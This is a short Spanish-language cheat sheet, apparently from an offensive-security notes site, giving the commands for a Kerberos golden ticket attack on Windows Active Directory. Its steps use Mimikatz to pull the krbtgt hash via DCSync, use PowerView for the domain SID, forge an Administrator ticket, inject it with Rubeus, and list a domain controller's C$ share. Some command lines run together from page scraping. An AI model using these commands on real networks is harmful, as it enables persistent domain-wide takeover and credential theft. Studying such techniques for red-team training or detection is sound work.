Golden Ticket
Descripción
Windows
Mimikatz
.\mimikatz.exe
lsadump::dcsync /user:<ACME.LOCAL>\krbtgt# PowerView
Get-DomainSID.\mimikatz.exe
kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ticket:golden-ticket.kirbi.\Rubeus.exe createnetonly /program:cmd.exe /show
.\Rubeus.exe ptt /ticket:golden-ticket.kirbi
dir \\<DC01.ACME.LOCAL>\C$Invoke-Mimikatz
Última actualización